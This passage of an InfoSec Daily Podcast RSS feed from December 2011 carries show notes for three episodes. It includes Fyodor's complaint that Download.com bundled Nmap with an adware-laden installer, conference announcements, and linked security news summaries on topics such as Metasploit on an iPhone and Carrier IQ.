	to Microsoft Bing, and changing their home page to Microsoft&#39;s MSN.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	The way it works is that C|Net&#39;s download page (screenshot attached)<br class="kix-line-break" /><br />
	offers what they claim to be Nmap&#39;s Windows installer. &nbsp;They even<br class="kix-line-break" /><br />
	provide the correct file size for our official installer. &nbsp;But users<br class="kix-line-break" /><br />
	actually get a Cnet-created trojan installer. &nbsp;That program does the<br class="kix-line-break" /><br />
	dirty work before downloading and executing Nmap&#39;s real installer.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Of course the problem is that users often just click through installer<br class="kix-line-break" /><br />
	screens, trusting that download.com gave them the real installer and<br class="kix-line-break" /><br />
	knowing that the Nmap project wouldn&#39;t put malicious code in our<br class="kix-line-break" /><br />
	installer. &nbsp;Then the next time the user opens their browser, they<br class="kix-line-break" /><br />
	find that their computer is hosed with crappy toolbars, Bing searches,<br class="kix-line-break" /><br />
	Microsoft as their home page, and whatever other shenanigans the<br class="kix-line-break" /><br />
	software performs! &nbsp;The worst thing is that users will think we (Nmap<br class="kix-line-break" /><br />
	Project) did this to them!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	I took and attached a screen shot of the C|Net trojan Nmap installer<br class="kix-line-break" /><br />
	in action. &nbsp;Note how they use our registered &quot;Nmap&quot; trademark in big<br class="kix-line-break" /><br />
	letters right above the malware &quot;special offer&quot; as if we somehow<br class="kix-line-break" /><br />
	endorsed or allowed this. &nbsp;Of course they also violated our trademark<br class="kix-line-break" /><br />
	by claiming this download is an Nmap installer when we have nothing to<br class="kix-line-break" /><br />
	do with the proprietary trojan installer.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	In addition to the deception and trademark violation, and potential<br class="kix-line-break" /><br />
	violation of the Computer Fraud and Abuse Act, this clearly violates<br class="kix-line-break" /><br />
	Nmap&#39;s copyright. &nbsp;This is exactly why Nmap isn&#39;t under the plain GPL.<br class="kix-line-break" /><br />
	Our license (</span><a href="http://nmap.org/book/man-legal.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://nmap.org/book/man-legal.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) specifically adds a<br class="kix-line-break" /><br />
	clause forbidding software which &quot;integrates/includes/aggregates Nmap<br class="kix-line-break" /><br />
	into a proprietary executable installer&quot; unless that software itself<br class="kix-line-break" /><br />
	conforms to various GPL requirements (this proprietary C|Net<br class="kix-line-break" /><br />
	download.com software and the toolbar don&#39;t). &nbsp;We&#39;ve long known that<br class="kix-line-break" /><br />
	malicious parties might try to distribute a trojan Nmap installer, but<br class="kix-line-break" /><br />
	we never thought it would be C|Net&#39;s Download.com, which is owned by<br class="kix-line-break" /><br />
	CBS! &nbsp;And we never thought Microsoft would be sponsoring this<br class="kix-line-break" /><br />
	activity!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	It is worth noting that C|Net&#39;s exact schemes vary. &nbsp;Here is a story<br class="kix-line-break" /><br />
	about their shenanigans:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	</span><a href="http://www.extremetech.com/computing/93504-download-com-wraps-downloads-in-bloatware-lies-about-motivations"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://www.extremetech.com/computing/93504-download-com-wraps-downloads-in-bloatware-lies-about-motivations</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	It is interesting to compare the trojaned VLC screenshot in that<br class="kix-line-break" /><br />
	article with the Nmap one I&#39;ve attached. &nbsp;In that case, the user just<br class="kix-line-break" /><br />
	clicks &quot;Next step&quot; to have their machine infected. &nbsp;And they wrote<br class="kix-line-break" /><br />
	&quot;SAFE, TRUSTED, AND SPYWARE FREE&quot; in the trojan-VLC title bar. &nbsp;It is<br class="kix-line-break" /><br />
	telling that they decided to remove that statement in their newer<br class="kix-line-break" /><br />
	trojan installer. &nbsp;In fact, if we UPX-unpack the Trojan CNet<br class="kix-line-break" /><br />
	executable and send it to VirusTotal.com, it is detected as malware by<br class="kix-line-break" /><br />
	Panda, McAfee, F-Secure, etc:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	</span><a href="http://bit.ly/cnet-nmap-vt"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://bit.ly/cnet-nmap-vt</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	According to Download.com&#39;s own stats, hundreds of people download the<br class="kix-line-break" /><br />
	trojan Nmap installer every week! &nbsp;So the first order of business is<br class="kix-line-break" /><br />
	to notify the community so that nobody else falls for this scheme.<br class="kix-line-break" /><br />
	Please help spread the word.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Of course the next step is to go after C|Net until they stop doing<br class="kix-line-break" /><br />
	this for ALL of the software they distribute. &nbsp;So far, the most they<br class="kix-line-break" /><br />
	have offered is:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	&nbsp;&quot;If you would like to opt out of the Download.com Installer you can<br class="kix-line-break" /><br />
	&nbsp;&nbsp;submit a request to cnet-installer () cbsinteractive com &nbsp;All opt-out<br class="kix-line-break" /><br />
	&nbsp;&nbsp;requests are carefully reviewed on a case-by-case basis.&quot;<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	In other words, &quot;we&#39;ll violate your trademarks and copyright and<br class="kix-line-break" /><br />
	squandering your goodwill until you tell us to stop, and then we&#39;ll<br class="kix-line-break" /><br />
	consider your request &#39;on a case-by-case basis&#39; depending on how much<br class="kix-line-break" /><br />
	money we make from infecting your users and how scary your legal<br class="kix-line-break" /><br />
	threat is.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	F*ck them! &nbsp;If anyone knows a great copyright attorney in the U.S.,<br class="kix-line-break" /><br />
	please send me the details or ask them to get in touch with me.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Also, shame on Microsoft for paying C|Net to trojan open source<br class="kix-line-break" /><br />
	software!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Cheers,<br class="kix-line-break" /><br />
	Fyodor</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3235/0/infosec-daily-podcast-episode-538.mp3" length="18136229" type="audio/mpeg" />
		<itunes:duration>0:37:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Ettercap-NG has just been updated and released&#8230; &#160;Lazarus is out!
	http://ettercap.sourceforge.net/ 
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone
	Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit&#39;s Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone&#39;s file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple&#39;s coding signing requirements, which allowed him to run arbitrary code on the iPhone.
	Source: 
	https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html
	The Washington Post has reported that Iran&#39;s cyber warfare unit took over the controls of a Lockheed Martin RQ-170 Sentinel stealth drone flying over Eastern Iran and landed it with minimal damage.
	As of this writing, the U.S. Air Force hasn&#39;t yet confirmed or denied the attack. I&#39;ve left a message with the on-call PA officer at Creech Air Force Base, which is the home of the 432d Wing which flies RQ-170 Sentinels according to this factsheet.
	Creech Air Force Base, as you may recall, suffered a malware infection of its Reaper and Predator Ground Control Stations last October. After Noah Shachtman broke the story, the Air Force issued a press release claiming that the malware was a simple &#34;credential stealer&#34; and not a &#34;keylogger&#34;, which is a distinction without a difference as I pointed out here.
	Approximately one and a half months after the Air Force issued that statement, Iran claims to have successfully compromised the flying operations of one of its drones &#8211; possibly flown out of the same Air Forc[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>yes</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 537 &#8211; Weekly wrap up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 04 Dec 2011 03:06:16 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3230</guid>
		<description><![CDATA[&#160; Episode 537 &#8211; Weekly wrap up with Dr. b0n3z InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad. &#160; Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><span>Episode 537 &#8211; Weekly wrap up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 537 for December 3, 2011. &nbsp;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>&nbsp;</p>
<p>Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian.</p>
<p><span>Announcements:</span><br />
		<span>Brad Smith (theNurse) </span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code: </span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a><br />
		<span>Second round of tickets sold out!</span></p>
<p><span>Thotcon 0&#215;3</span><br />
		<span>When: Friday April 27th, 2012</span><br />
		<span>Where: Secret location in Chicago</span><br />
		<a href="http://tickets.thotcon.org/"><span>http://tickets.thotcon.org/</span></a><br />
		<span>Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></p>
<p><span>AIDE 2012 </span><br />
		<span>When: May 21-25, 2012 </span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></p>
<p><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p><span>Stories:</span></p>
<p><span>Source: </span><a href="https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469"><span>https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469</span></a></p>
<p><span>This article asserts that it&rsquo;s a bad idea to jump into IT with nothing more than your cert. &nbsp;Probably true. &nbsp;Do you guys think any of this carries over to security?</span></p>
<p><span>Source:</span><span> </span><a href="http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/"><span>http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/</span></a></p>
<p><span>Here is a fairly narrow-minded write up on carrier IQ from mashable. &nbsp;This line says it all:</span></p>
<p><span>&ldquo;&#8230;it would be nearly impossible for anyone without a programming degree to decipher it. The hieroglyphics spit out by Carrier IQ actually reminded me of code I had seen before. Not on an Android device or even another mobile phone, but on a PC and from a pretty long time ago.&rdquo;</span></p>
<p><span>So in other words, since the author of that article can&rsquo;t figure it out, no one can. &nbsp;And no tools could POSSIBLY be written to parse the CIQ output.</span></p>
<p><span>Lot&rsquo;s of nonsense to talk about in this blog post&#8230;</span><br />
		<span>Source:</span><span> </span><a href="http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml"><span>http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml</span></a></p>
<p><span>This statement makes me reach for my tinfoil hat for some reason:</span></p>
<p><span>&ldquo;Cyber security is &quot;a huge growth factor&quot; for the FBI, says Welch. He expects the bureau&#039;s Cyber Division to double in size during the next 12 to 18 months.&ldquo;</span></p>
<p><span>Source:</span><span> </span><a href="http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html"><span>http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html</span></a></p>
<p><span>I&rsquo;ll be your best friend&#8230;</span></p>
<p><span>Clever technique for becoming virtually anyone&rsquo;s friend on facebook with a little work by exploiting the web of trust&#8230;</span></p>
<p><span>Source:</span><span> </span><a href="https://www.net-security.org/secworld.php?id=12008"><span>https://www.net-security.org/secworld.php?id=12008</span></a></p>
<p><span>Lesson, if you want to blog anonymously, don&rsquo;t use the same Google Analytics account for all your sites.</span></p>
<p><span>Source:</span><span> </span><a href="http://arstechnica.com/business/news/2011/11/europes-largest-it-firm-to-scrap-internal-e-mail.ars"><span>http://arstechnica.com/business/news/2011/11/europes-largest-it-firm-to-scrap-internal-e-mail.ars</span></a></p>
<p><span>Unique solution to the corporate spam problem.</span></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3230/0/infosec-daily-podcast-episode-537.mp3" length="23580707" type="audio/mpeg" />
		<itunes:duration>0:49:08</itunes:duration>
		<itunes:subtitle>&#160;
Episode 537 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
&#160;
Guests: gradius, warrax, brew_ninja, fr0[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 537 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
&#160;
Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian.
Announcements:
		Brad Smith (theNurse) 
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code: 
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
		Second round of tickets sold out!
Thotcon 0&#215;3
		When: Friday April 27th, 2012
		Where: Secret location in Chicago
		http://tickets.thotcon.org/
		Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012 
		When: May 21-25, 2012 
		Where: MU Forensic Science Center
		http://aide.marshall.edu
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Stories:
Source: https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469
This article asserts that it&#8217;s a bad idea to jump into IT with nothing more than your cert. &#160;Probably true. &#160;Do you guys think any of this carries over to security?
Source: http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/
Here is a fairly narrow-minded write up on carrier IQ from mashable. &#160;This line says it all:
&#8220;&#8230;it would be nearly impossible for anyone without a programming degree to decipher it. The hieroglyphics spit out by Carrier IQ actually reminded me of code I had seen before. Not on an Android device or even another mobile phone, but on a PC and from a pretty long time ago.&#8221;
So in other words, since the author of that article can&#8217;t figure it out, no one can. &#160;And no tools could POSSIBLY be written to parse the CIQ output.
Lot&#8217;s of nonsense to talk about in this blog post&#8230;
		Source: http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml
This statement makes me reach for my tinfoil hat for some reason:
&#8220;Cyber security is &#34;a huge growth factor&#34; for the FBI, says Welch. He expects the bureau&#039;s Cyber Division to double in size during the next 12 to 18 months.&#8220;
Source: http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html
I&#8217;ll be your best friend&#8230;
Clever technique for becoming virtually anyone&#8217;s friend on facebook with a little work by exploiting the web of trust&#8230;
Source: https://www.net-security.org/secworld.php?id=12008
Lesson, if you want to blog anonymously, don&#8217;t use the same Google Analytics account[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 536 &#8211; CIQ Detector, VoIP Hopper, PlayBook, Safe Browsing, Yahoo 0-day, Legal Piracy, The Mole &amp; Certified Paycut</title>
		<link>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut</link>
		<comments>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut#comments</comments>
		<pubDate>Sat, 03 Dec 2011 02:09:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3224</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 536 for December 2, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Second round of tickets sold out!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
